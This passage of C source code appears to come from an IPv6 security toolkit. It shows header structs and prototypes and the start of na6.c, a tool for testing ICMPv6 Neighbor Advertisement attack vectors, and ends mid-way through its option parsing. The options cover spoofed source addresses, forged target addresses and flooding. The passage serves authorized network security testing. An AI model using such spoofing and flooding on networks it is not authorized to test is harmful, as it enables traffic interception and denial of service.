8 15 16 23 24 31 +--------+--------+--------+--------+ | Source | Destination | | Port | Port | +--------+--------+--------+--------+ | | | | Length | Checksum | +--------+--------+--------+--------+ | | data octets ... +---------------- ... User Datagram Header Format */ struct udp_hdr{ uint16_t uh_sport; /* source port */ uint16_t uh_dport; /* destination port */ uint16_t uh_ulen; /* udp length */ uint16_t uh_sum; /* udp checksum */ } __attribute__ ((__packed__)); /* Definition of the Authentication Header 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Next Header | Payload Len | RESERVED | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Security Parameters Index (SPI) | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | Sequence Number Field | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | + Integrity Check Value-ICV (variable) | | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ struct ah_hdr{ uint8_t ah_nxt; /* Next Header */ uint8_t ah_len; /* Payload length */ uint16_t ah_rsvd; /* Reserved */ uint32_t ah_spi; /* Reserved */ uint32_t ah_seq; /* Reserved */ uint32_t ah_icv; /* Integrity Check Value - ICV */ } __attribute__ ((__packed__)); /* Definition of the Encapsulating Security Payload 0 1 2 3 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ---- | Security Parameters Index (SPI) | ^Int. +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Cov- | Sequence Number | |ered +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | ---- | Payload Data* (variable) | | ^ ~ ~ | | | | |Conf. + +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ |Cov- | | Padding (0-255 bytes) | |ered* +-+-+-+-+-+-+-+-+ +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ | | | | Pad Length | Next Header | v v +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ ------ | Integrity Check Value-ICV (variable) | ~ ~ | | +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+ */ struct esp_hdr{ uint32_t esp_spi; /* Reserved */ uint32_t esp_seq; /* Reserved */ uint32_t ah_payload; /* Integrity Check Value - ICV */ } __attribute__ ((__packed__)); #define ARP_REQUEST 1 #define ARP_REPLY 2 #define RARP_REQUEST 3 #define RARP_REPLY 4 struct arp_hdr{ struct ether_header ether; uint16_t hard_type; /* packet type ID field */ uint16_t prot_type; /* packet type ID field */ uint8_t hard_size; uint8_t prot_size; uint8_t op; struct ether_addr src_ether; struct in_addr src_ip; struct ether_addr tgt_ether; struct in_addr tgt_ip; } __attribute__ ((__packed__)); /* For obtaining an IPv6 target */ struct target_ipv6{ struct in6_addr ip6; /* IPv6 address */ char name [NI_MAXHOST]; /* Name */ char canonname [NI_MAXHOST]; /* Canonic name */ int res; /* Error code */ unsigned int flags; /* Value-result: Whether the canonic name is required/obtained */ }; struct prefix_entry{ struct in6_addr ip6; unsigned char len; }; struct prefix_list{ struct prefix_entry **prefix; unsigned int nprefix; unsigned int maxprefix; }; struct prefix4_entry{ struct in_addr ip; unsigned char len; }; struct host_entry{ struct in6_addr ip6; struct ether_addr ether; unsigned char flag; struct host_entry *next; }; struct host_list{ struct host_entry **host; unsigned int nhosts; unsigned int maxhosts; }; struct address_list{ struct in6_addr *addr; unsigned int naddr; unsigned int maxaddr; }; #define MAX_IFACES 25 struct iface_entry{ int ifindex; char iface[IFACE_LENGTH]; struct ether_addr ether; unsigned char ether_f; struct prefix_list ip6_global; struct prefix_list ip6_local; int flags; }; struct iface_list{ struct iface_entry *ifaces; unsigned int nifaces; unsigned int maxifaces; }; /* Constants employed by decode_ipv6_address() */ #define IPV6_UNSPEC 1 #define IPV6_MULTICAST 2 #define IPV6_UNICAST 4 #define UCAST_V4MAPPED 1 #define UCAST_V4COMPAT 2 #define UCAST_LINKLOCAL 4 #define UCAST_SITELOCAL 8 #define UCAST_UNIQUELOCAL 16 #define UCAST_6TO4 32 #define UCAST_TEREDO 64 #define UCAST_GLOBAL 128 #define UCAST_LOOPBACK 256 #define MCAST_PERMANENT 512 #define MCAST_NONPERMANENT 1024 #define MCAST_INVALID 2048 #define MCAST_UNICASTBASED 4096 #define MCAST_EMBEDRP 8192 #define MCAST_UNKNOWN 16384 #define SCOPE_RESERVED 1 #define SCOPE_INTERFACE 2 #define SCOPE_LINK 4 #define SCOPE_ADMIN 8 #define SCOPE_SITE 16 #define SCOPE_ORGANIZATION 32 #define SCOPE_GLOBAL 64 #define SCOPE_UNASSIGNED 128 #define SCOPE_UNSPECIFIED 256 #define IID_MACDERIVED 1 #define IID_ISATAP 2 #define IID_EMBEDDEDIPV4 4 #define IID_EMBEDDEDIPV4_32 8192 #define IID_EMBEDDEDIPV4_64 64 #define IID_EMBEDDEDPORT 8 #define IID_EMBEDDEDPORTREV 16 #define IID_LOWBYTE 32 #define IID_PATTERN_BYTES 128 #define IID_RANDOM 256 #define IID_TEREDO_RFC4380 512 #define IID_TEREDO_RFC5991 1024 #define IID_TEREDO_UNKNOWN 2048 #define IID_UNSPECIFIED 4096 /* This struture is employed by decode_ipv6_address */ struct decode6{ struct in6_addr ip6; unsigned int type; unsigned int subtype; unsigned int scope; unsigned int iidtype; unsigned int iidsubtype; }; #ifndef IN6_IS_ADDR_UNIQUELOCAL #define IN6_IS_ADDR_UNIQUELOCAL(a) \ ((((uint32_t *) (a))[0] & htonl (0xfe000000)) \ == htonl (0xfc000000)) #endif #ifndef IN6_IS_ADDR_6TO4 #define IN6_IS_ADDR_6TO4(a) \ ((((uint32_t *) (a))[0] & htonl (0xffff0000)) \ == htonl (0x20020000)) #endif #ifndef IN6_IS_ADDR_TEREDO #define IN6_IS_ADDR_TEREDO(a) \ (((uint32_t *) (a))[0] == htonl (0x20020000)) #endif #ifndef IN6_IS_ADDR_TEREDO_LEGACY #define IN6_IS_ADDR_TEREDO_LEGACY(a) \ (((uint32_t *) (a))[0] == htonl (0x3ffe831f)) #endif #if defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__) #ifndef s6_addr16 #define s6_addr16 __u6_addr.__u6_addr16 #endif #ifndef s6_addr #define s6_addr __u6_addr.__u6_addr8 #endif #ifndef s6_addr8 #define s6_addr8 __u6_addr.__u6_addr8 #endif #ifndef s6_addr32 #define s6_addr32 __u6_addr.__u6_addr32 #endif #elif defined __linux__ || ( !defined(__FreeBSD__) && defined(__FreeBSD_kernel__)) #ifndef s6_addr16 #define s6_addr16 __in6_u.__u6_addr16 #endif #ifndef s6_addr32 #define s6_addr32 __in6_u.__u6_addr32 #endif #elif defined(__sun) || defined(sun) #ifndef s6_addr8 #define s6_addr8 _S6_un._S6_u8 #endif #ifndef s6_addr32 #define s6_addr32 _S6_un._S6_u32 #endif #endif /* This causes Linux to use the BSD definition of the TCP and UDP header fields */ #ifndef __FAVOR_BSD #define __FAVOR_BSD #endif /* Names (DNS, NI) related constants and definitions */ #define MAX_DOMAIN_LEN 512 #define MAX_DNS_LABELS 50 #define MAX_DNS_CLABELS 5 /* ICMPv6 Types/Codes not defined in some OSes */ #ifndef ICMP6_DST_UNREACH_FAILEDPOLICY #define ICMP6_DST_UNREACH_FAILEDPOLICY 5 #endif #ifndef ICMP6_DST_UNREACH_REJECTROUTE #define ICMP6_DST_UNREACH_REJECTROUTE 6 #endif #if !(defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) || defined(__APPLE__)) /* Definitions for Linux */ #ifndef _NETINET_ICMP6_H #include #endif #define ICMP6_NI_QUERY 139 /* node information request */ #define ICMP6_NI_REPLY 140 /* node information reply */ /* * icmp6 namelookup */ struct icmp6_namelookup { struct icmp6_hdr icmp6_nl_hdr; uint8_t icmp6_nl_nonce[8]; int32_t icmp6_nl_ttl; #if 0 uint8_t icmp6_nl_len; uint8_t icmp6_nl_name[3]; #endif /* could be followed by options */ } __attribute__ ((__packed__)); /* * icmp6 node information */ struct icmp6_nodeinfo { struct icmp6_hdr icmp6_ni_hdr; uint8_t icmp6_ni_nonce[8]; /* could be followed by reply data */ } __attribute__ ((__packed__)); #define ni_type icmp6_ni_hdr.icmp6_type #define ni_code icmp6_ni_hdr.icmp6_code #define ni_cksum icmp6_ni_hdr.icmp6_cksum #define ni_qtype icmp6_ni_hdr.icmp6_data16[0] #define ni_flags icmp6_ni_hdr.icmp6_data16[1] #define NI_QTYPE_NOOP 0 /* NOOP */ #define NI_QTYPE_SUPTYPES 1 /* Supported Qtypes */ #define NI_QTYPE_FQDN 2 /* FQDN (draft 04) */ #define NI_QTYPE_DNSNAME 2 /* DNS Name */ #define NI_QTYPE_NODEADDR 3 /* Node Addresses */ #define NI_QTYPE_IPV4ADDR 4 /* IPv4 Addresses */ #if __BYTE_ORDER == __BIG_ENDIAN #define NI_SUPTYPE_FLAG_COMPRESS 0x1 #define NI_FQDN_FLAG_VALIDTTL 0x1 #elif __BYTE_ORDER == __LITTLE_ENDIAN #define NI_SUPTYPE_FLAG_COMPRESS 0x0100 #define NI_FQDN_FLAG_VALIDTTL 0x0100 #endif #if __BYTE_ORDER == __BIG_ENDIAN #define NI_NODEADDR_FLAG_TRUNCATE 0x1 #define NI_NODEADDR_FLAG_ALL 0x2 #define NI_NODEADDR_FLAG_COMPAT 0x4 #define NI_NODEADDR_FLAG_LINKLOCAL 0x8 #define NI_NODEADDR_FLAG_SITELOCAL 0x10 #define NI_NODEADDR_FLAG_GLOBAL 0x20 #define NI_NODEADDR_FLAG_ANYCAST 0x40 /* just experimental. not in spec */ #elif __BYTE_ORDER == __LITTLE_ENDIAN #define NI_NODEADDR_FLAG_TRUNCATE 0x0100 #define NI_NODEADDR_FLAG_ALL 0x0200 #define NI_NODEADDR_FLAG_COMPAT 0x0400 #define NI_NODEADDR_FLAG_LINKLOCAL 0x0800 #define NI_NODEADDR_FLAG_SITELOCAL 0x1000 #define NI_NODEADDR_FLAG_GLOBAL 0x2000 #define NI_NODEADDR_FLAG_ANYCAST 0x4000 /* just experimental. not in spec */ #endif struct ni_reply_fqdn { uint32_t ni_fqdn_ttl; /* TTL */ uint8_t ni_fqdn_namelen; /* length in octets of the FQDN */ uint8_t ni_fqdn_name[3]; /* XXX: alignment */ } __attribute__ ((__packed__)); #endif struct ni_reply_ip6 { uint32_t ni_ip6_ttl; /* TTL */ struct in6_addr ip6; /* IPv6 address */ } __attribute__ ((__packed__)); struct ni_reply_ip { uint32_t ni_ip_ttl; /* TTL */ struct in_addr ip; /* IPv6 address */ } __attribute__ ((__packed__)); struct ni_reply_name { uint32_t ni_name_ttl; /* TTL */ unsigned char ni_name_name; /* IPv6 address */ } __attribute__ ((__packed__)); /* ICMPv6 Types/Codes not defined in some OSes */ #ifndef ICMP6_DST_UNREACH_FAILEDPOLICY #define ICMP6_DST_UNREACH_FAILEDPOLICY 5 #endif #ifndef ICMP6_DST_UNREACH_REJECTROUTE #define ICMP6_DST_UNREACH_REJECTROUTE 6 #endif struct packet{ unsigned char *link; unsigned char *ipv6; unsigned char *upper; unsigned long maxsize; }; struct iface_data{ char iface[IFACE_LENGTH]; unsigned char iface_f; pcap_t *pfd; int ifindex; unsigned char ifindex_f; struct iface_list iflist; unsigned int type; unsigned int flags; int fd; unsigned int pending_write_f; void *pending_write_data; unsigned int pending_write_size; fd_set *rset; fd_set *wset; fd_set *eset; unsigned int write_errors; struct ether_addr ether; unsigned int ether_flag; unsigned int linkhsize; unsigned int max_packet_size; struct in6_addr ip6_local; unsigned int ip6_local_flag; struct prefix_list ip6_global; unsigned int ip6_global_flag; struct in6_addr router_ip6; struct ether_addr router_ether; struct prefix_list prefix_ac; struct prefix_list prefix_ol; unsigned int local_retrans; unsigned int local_timeout; unsigned int mtu; struct ether_addr hsrcaddr; unsigned int hsrcaddr_f; struct ether_addr hdstaddr; unsigned int hdstaddr_f; struct in6_addr srcaddr; unsigned int src_f; /* XXX Set when a source address has been selected (even if automatically) */ unsigned int srcaddr_f; unsigned char srcpreflen; unsigned char srcprefix_f; struct in6_addr dstaddr; unsigned int dstaddr_f; unsigned int verbose_f; unsigned char listen_f; unsigned char fragh_f; /* XXX The next four variables are kind of a duplicate of router_ip6 and router_ether above. May remove them at some point */ struct in6_addr nhaddr; unsigned char nhaddr_f; struct ether_addr nhhaddr; unsigned char nhhaddr_f; int nhifindex; unsigned char nhifindex_f; char nhiface[IFACE_LENGTH]; unsigned char nh_f; }; #ifdef __linux__ /* Consulting the routing table */ #define MAX_NLPAYLOAD 1024 #else #define MAX_RTPAYLOAD 1024 #endif #if defined(__linux__) #define SLL_ADDRLEN 0 struct sll_linux{ uint16_t sll_pkttype; /* packet type */ uint16_t sll_hatype; /* link-layer address type */ uint16_t sll_halen; /* link-layer address length */ uint8_t sll_addr[SLL_ADDRLEN]; /* link-layer address */ uint16_t sll_protocol; /* protocol */ } __attribute__ ((__packed__)); #endif struct next_hop{ struct in6_addr srcaddr; unsigned char srcaddr_f; struct in6_addr dstaddr; unsigned char dstaddr_f; struct in6_addr nhaddr; unsigned char nhaddr_f; struct ether_addr nhhaddr; unsigned char nhhaddr_f; int ifindex; unsigned char ifindex_f; }; /* Flags that specify what the load_dst_and_pcap() function should do */ #define LOAD_PCAP_ONLY 0x01 #define LOAD_SRC_NXT_HOP 0x02 /* Constants to signal special interface types */ #define IFACE_LOOPBACK 1 #define IFACE_TUNNEL 2 #ifndef SA_SIZE #if defined(__APPLE__) #define SA_SIZE(sa) \ ( (!(sa) || ((struct sockaddr *)(sa))->sa_len == 0) ? \ sizeof(long) : \ ((struct sockaddr *)(sa))->sa_len ) #elif defined (__FreeBSD__) || defined(__NetBSD__) || defined (__OpenBSD__) #define SA_SIZE(sa) \ ( (!(sa) || ((struct sockaddr *)(sa))->sa_len == 0) ? \ sizeof(long) : \ 1 + ( (((struct sockaddr *)(sa))->sa_len - 1) | (sizeof(long) - 1) ) ) #else #define SA_SIZE(sa) sizeof(struct sockaddr) #endif #endif int address_contains_colons(char *); int address_contains_ranges(char *); void change_endianness(uint32_t *, unsigned int); void debug_print_ifaces_data(struct iface_list *); uint16_t dec_to_hex(uint16_t); void decode_ipv6_address(struct decode6 *); int dns_decode(unsigned char *, unsigned int, unsigned char *, char *, unsigned int, unsigned char **); int dns_str2wire(char *, unsigned int, char *, unsigned int); void dump_hex(void *, size_t); struct ether_addr ether_multicast(const struct in6_addr *); int ether_ntop(const struct ether_addr *, char *, size_t); int ether_pton(const char *, struct ether_addr *, unsigned int); void ether_to_ipv6_linklocal(struct ether_addr *etheraddr, struct in6_addr *ipv6addr); void *find_iface_by_index(struct iface_list *, int); void *find_iface_by_name(struct iface_list *, char *); void *find_iface_by_addr(struct iface_list *, struct in6_addr *); int find_ipv6_router(pcap_t *, struct ether_addr *, struct in6_addr *, struct ether_addr *, struct in6_addr *); int find_ipv6_router_full(pcap_t *, struct iface_data *); struct iface_entry *find_matching_address(struct iface_data *, struct iface_list *, struct in6_addr *, struct in6_addr *); void generate_slaac_address(struct in6_addr *, struct ether_addr *, struct in6_addr *); int get_if_addrs(struct iface_data *); int get_local_addrs(struct iface_data *); int get_ipv6_address(struct in6_addr *, char *); int get_ipv6_target(struct target_ipv6 *); int inc_sdev(uint32_t *, unsigned int, uint32_t *, double *); int init_iface_data(struct iface_data *); int init_filters(struct filters *); uint16_t in_chksum(void *, void *, size_t, uint8_t); int insert_pad_opt(unsigned char *ptrhdr, const unsigned char *, unsigned int); int ipv6_to_ether(pcap_t *, struct iface_data *, struct in6_addr *, struct ether_addr *); unsigned int ip6_longest_match(struct in6_addr *, struct in6_addr *); int is_iid_null(struct in6_addr *, uint8_t); int is_ip6_in_address_list(struct prefix_list *, struct in6_addr *); int is_ip6_in_iface_entry(struct iface_list *, int, struct in6_addr *); int is_ip6_in_list(struct in6_addr *, struct host_list *); int is_ip6_in_prefix_list(struct in6_addr *, struct prefix_list *); int is_eq_in6_addr(struct in6_addr *, struct in6_addr *); unsigned int is_service_port(uint16_t); int is_time_elapsed(struct timeval *, struct timeval *, unsigned long); int keyval(char *, unsigned int, char **, char **); int load_dst_and_pcap(struct iface_data *, unsigned int); unsigned int match_ether(struct ether_addr *, unsigned int, struct ether_addr *); unsigned int match_ipv6(struct in6_addr *, uint8_t *, unsigned int, struct in6_addr *); int match_ipv6_to_prefixes(struct in6_addr *, struct prefix_list *); void print_filters(struct iface_data *, struct filters *); void print_filter_result(struct iface_data *, const u_char *, unsigned char); unsigned int print_ipv6_address(char *s, struct in6_addr *); unsigned int print_ipv6_address_rev(struct in6_addr *); int print_local_addrs(struct iface_data *); void randomize_ether_addr(struct ether_addr *); void randomize_ipv6_addr(struct in6_addr *, struct in6_addr *, uint8_t); int read_ipv6_address(char *, unsigned int, struct in6_addr *); int read_prefix(char *, unsigned int, char **); void release_privileges(void); void sanitize_ipv4_prefix(struct prefix4_entry *); void sanitize_ipv6_prefix(struct in6_addr *, uint8_t); int send_neighbor_advert(struct iface_data *, pcap_t *, const u_char *); int send_neighbor_solicit(struct iface_data *, struct in6_addr *); int sel_src_addr(struct iface_data *); struct in6_addr * sel_src_addr_ra(struct iface_data *, struct in6_addr *); int sel_next_hop(struct iface_data *); int sel_next_hop_ra(struct iface_data *); void sig_alarm(int); struct in6_addr solicited_node(const struct in6_addr *); int string_escapes(char *, unsigned int *, unsigned int); size_t Strnlen(const char *, size_t); struct timeval timeval_sub(struct timeval *, struct timeval *); float time_diff_ms(struct timeval *, struct timeval *); unsigned int zero_byte_iid(struct in6_addr *); ipv6toolkit-2.0+ds.1/tools/na6.c000066400000000000000000001414241254360455000164100ustar00rootroot00000000000000/* * na6: A security assessment tool for attack vectors based on * ICMPv6 Neighbor Advertisement messages * * Copyright (C) 2011-2013 Fernando Gont * * Programmed by Fernando Gont for SI6 Networks * * This program is free software: you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation, either version 3 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program. If not, see . * * Build with: make na6 * * The libpcap library must be previsously installed on your system. * * Please send any bug reports to Fernando Gont */ #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include #include "na6.h" #include "libipv6.h" #include "ipv6toolkit.h" /* Function prototypes */ void init_packet_data(struct iface_data *); int send_packet(struct iface_data *, struct pcap_pkthdr *, const u_char *); void print_attack_info(struct iface_data *); void usage(void); void print_help(void); struct pcap_pkthdr *pkthdr; const u_char *pktdata; struct in6_addr *pkt_ipv6addr; bpf_u_int32 my_netmask; bpf_u_int32 my_ip; struct bpf_program pcap_filter; char dev[64], errbuf[PCAP_ERRBUF_SIZE]; char all_nodes_addr[]= ALL_NODES_MULTICAST_ADDR; unsigned char buffer[65556]; unsigned char *v6buffer, *ptr, *startofprefixes; struct ip6_hdr *ipv6, *pkt_ipv6; struct nd_neighbor_advert *na; struct icmp6_hdr *pkt_icmp6; struct nd_neighbor_solicit *pkt_ns; struct ether_header *ethernet, *pkt_ether; struct nd_opt_tlla *tllaopt; struct in6_addr targetaddr; struct ether_addr linkaddr[MAX_TLLA_OPTION]; unsigned int nlinkaddr=0, linkaddrs; char *lasts, *pref, *rpref, *endptr; char *charptr; size_t nw; unsigned long ul_res, ul_val; unsigned int i, j, startrand; unsigned int skip; unsigned int ntargets, sources, nsources, targets, nsleep; unsigned char targetpreflen; uint16_t mask; uint8_t hoplimit; char plinkaddr[ETHER_ADDR_PLEN]; char psrcaddr[INET6_ADDRSTRLEN], pdstaddr[INET6_ADDRSTRLEN], pv6addr[INET6_ADDRSTRLEN]; unsigned char floodt_f=0, targetaddr_f=0; unsigned char listen_f = 0, multicastdst_f=0, accepted_f=0, loop_f=0, sleep_f=0; unsigned char tllaopt_f=0, tllaopta_f=0, targetprefix_f=0, hoplimit_f=0; unsigned char newdata_f=0, floods_f=0; uint32_t router_f=0, solicited_f=0, override_f=0; /* Support for Extension Headers */ unsigned int dstopthdrs, dstoptuhdrs, hbhopthdrs; unsigned char hbhopthdr_f=0, dstoptuhdr_f=0, dstopthdr_f=0; unsigned char *dstopthdr[MAX_DST_OPT_HDR], *dstoptuhdr[MAX_DST_OPT_U_HDR]; unsigned char *hbhopthdr[MAX_HBH_OPT_HDR]; unsigned int dstopthdrlen[MAX_DST_OPT_HDR], dstoptuhdrlen[MAX_DST_OPT_U_HDR]; unsigned int hbhopthdrlen[MAX_HBH_OPT_HDR], m, pad; struct ip6_frag fraghdr, *fh; struct ip6_hdr *fipv6; unsigned char fragbuffer[ETHER_HDR_LEN+MIN_IPV6_HLEN+MAX_IPV6_PAYLOAD]; unsigned char *fragpart, *fptr, *fptrend, *ptrend, *ptrhdr, *ptrhdrend; unsigned int hdrlen, ndstopthdr=0, nhbhopthdr=0, ndstoptuhdr=0; unsigned int nfrags, fragsize; unsigned char *prev_nh, *startoffragment; struct filters filters; struct iface_data idata; int main(int argc, char **argv){ extern char *optarg; int r, sel; fd_set sset, rset; #if defined(sun) || defined(__sun) || defined (__linux__) struct timeval timeout; #endif struct target_ipv6 targetipv6; static struct option longopts[] = { {"interface", required_argument, 0, 'i'}, {"src-address", required_argument, 0, 's'}, {"dst-address", required_argument, 0, 'd'}, {"hop-limit", required_argument, 0, 'A'}, {"dst-opt-hdr", required_argument, 0, 'u'}, {"dst-opt-u-hdr", required_argument, 0, 'U'}, {"hbh-opt-hdr", required_argument, 0, 'H'}, {"frag-hdr", required_argument, 0, 'y'}, {"link-src-addr", required_argument, 0, 'S'}, {"link-dst-addr", required_argument, 0, 'D'}, {"target", required_argument, 0, 't'}, {"router", no_argument, 0, 'r'}, {"solicited", no_argument, 0, 'c'}, {"override", no_argument, 0, 'o'}, {"target-addr-opt", required_argument, 0, 'E'}, {"add-target-opt", no_argument, 0, 'e'}, {"block-src-addr", required_argument, 0, 'j'}, {"block-dst-addr", required_argument, 0, 'k'}, {"block-link-src-addr", required_argument, 0, 'J'}, {"block-link-dst-addr", required_argument, 0, 'K'}, {"block-target-addr", required_argument, 0, 'w'}, {"accept-src-addr", required_argument, 0, 'b'}, {"accept-dst-addr", required_argument, 0, 'g'}, {"accept-link-src-addr", required_argument, 0, 'B'}, {"accept-link-dst-addr", required_argument, 0, 'G'}, {"accept-target-addr", required_argument, 0, 'W'}, {"flood-sources", required_argument, 0, 'F'}, {"flood-targets", required_argument, 0, 'T'}, {"loop", no_argument, 0, 'l'}, {"sleep", required_argument, 0, 'z'}, {"listen", no_argument, 0, 'L'}, {"verbose", no_argument, 0, 'v'}, {"help", no_argument, 0, 'h'}, {0, 0, 0, 0 } }; char shortopts[]= "i:s:d:A:u:U:H:y:S:D:t:roceE:j:k:J:K:w:b:g:B:G:W:T:F:lz:vhL"; char option; if(argc<=1){ usage(); exit(EXIT_FAILURE); } hoplimit=255; /* Initialize filters structure */ if(init_filters(&filters) == -1){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } if(init_iface_data(&idata) == FAILURE){ puts("Error initializing internal data structure"); exit(EXIT_FAILURE); } while((r=getopt_long(argc, argv, shortopts, longopts, NULL)) != -1) { option= r; switch(option) { case 'i': /* Interface */ strncpy(idata.iface, optarg, IFACE_LENGTH-1); idata.iface[IFACE_LENGTH-1]=0; idata.iface_f=TRUE; break; case 's': /* IPv6 Source Address */ if(idata.srcaddr_f){ puts("Error: Multiple '-s' options have been specified"); exit(EXIT_FAILURE); } if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Error in Source Address"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &(idata.srcaddr)) <= 0){ puts("inet_pton(): Source Address not valid"); exit(EXIT_FAILURE); } idata.srcaddr_f = 1; if((charptr = strtok_r(NULL, " ", &lasts)) != NULL){ idata.srcpreflen = atoi(charptr); if(idata.srcpreflen>128){ puts("Prefix length error in IPv6 Source Address"); exit(EXIT_FAILURE); } sanitize_ipv6_prefix(&(idata.srcaddr), idata.srcpreflen); idata.srcprefix_f=1; } break; case 'd': /* IPv6 Destination Address */ strncpy( targetipv6.name, optarg, NI_MAXHOST); targetipv6.name[NI_MAXHOST-1]= 0; targetipv6.flags= AI_CANONNAME; if( (r=get_ipv6_target(&targetipv6)) != 0){ if(r < 0){ printf("Unknown Destination: %s\n", gai_strerror(targetipv6.res)); } else{ puts("Unknown Destination: No IPv6 address found for specified destination"); } exit(1); } idata.dstaddr= targetipv6.ip6; idata.dstaddr_f = 1; break; case 'A': /* Hop Limit */ hoplimit= atoi(optarg); hoplimit_f=1; break; case 'y': /* Fragment header */ nfrags= atoi(optarg); if(nfrags < 8){ puts("Error in Fragmentation option: Fragment Size must be at least 8 bytes"); exit(EXIT_FAILURE); } nfrags = (nfrags +7) & 0xfff8; idata.fragh_f= 1; break; case 'u': /* Destinations Options Header */ if(ndstopthdr >= MAX_DST_OPT_HDR){ puts("Too many Destination Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstopthdrlen[ndstopthdr]= hdrlen; if( (dstopthdr[ndstopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header"); exit(EXIT_FAILURE); } ptrhdr= dstopthdr[ndstopthdr] + 2; ptrhdrend= dstopthdr[ndstopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr= ptrhdr + pad; } *(dstopthdr[ndstopthdr]+1)= (hdrlen/8)-1; ndstopthdr++; dstopthdr_f=1; break; case 'U': /* Destination Options Header (Unfragmentable Part) */ if(ndstoptuhdr >= MAX_DST_OPT_U_HDR){ puts("Too many Destination Options Headers (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; dstoptuhdrlen[ndstoptuhdr]= hdrlen; if( (dstoptuhdr[ndstoptuhdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Destination Options Header (Unfragmentable Part)"); exit(EXIT_FAILURE); } ptrhdr= dstoptuhdr[ndstoptuhdr]+2; ptrhdrend= dstoptuhdr[ndstoptuhdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Destination Options Header (Unfragmentable Part) Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(dstoptuhdr[ndstoptuhdr]+1)= (hdrlen/8) - 1; ndstoptuhdr++; dstoptuhdr_f=1; break; case 'H': /* Hop-by-Hop Options Header */ if(nhbhopthdr >= MAX_HBH_OPT_HDR){ puts("Too many Hop-by-Hop Options Headers"); exit(EXIT_FAILURE); } hdrlen= atoi(optarg); if(hdrlen < 8){ puts("Bad length in Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } hdrlen = ((hdrlen+7)/8) * 8; hbhopthdrlen[nhbhopthdr]= hdrlen; if( (hbhopthdr[nhbhopthdr]= malloc(hdrlen)) == NULL){ puts("Not enough memory for Hop-by-Hop Options Header"); exit(EXIT_FAILURE); } ptrhdr= hbhopthdr[nhbhopthdr] + 2; ptrhdrend= hbhopthdr[nhbhopthdr] + hdrlen; while( ptrhdr < ptrhdrend){ if( (ptrhdrend-ptrhdr)>257) pad= 257; else pad= ptrhdrend-ptrhdr; if(!insert_pad_opt(ptrhdr, ptrhdrend, pad)){ puts("Hop-by-Hop Options Header Too Big"); exit(EXIT_FAILURE); } ptrhdr = ptrhdr + pad; } *(hbhopthdr[nhbhopthdr]+1)= (hdrlen/8) - 1; nhbhopthdr++; hbhopthdr_f=1; break; case 'S': /* Source Ethernet address */ if(ether_pton(optarg, &(idata.hsrcaddr), sizeof(idata.hsrcaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hsrcaddr_f = 1; break; case 'D': /* Destination Ethernet Address */ if(ether_pton(optarg, &(idata.hdstaddr), sizeof(idata.hdstaddr)) == 0){ puts("Error in Source link-layer address."); exit(EXIT_FAILURE); } idata.hdstaddr_f = 1; break; case 't': /* NA Target address */ if((charptr = strtok_r(optarg, "/", &lasts)) == NULL){ puts("Target Address not valid"); exit(EXIT_FAILURE); } if ( inet_pton(AF_INET6, charptr, &targetaddr) <= 0){ puts("inet_pton(): Target 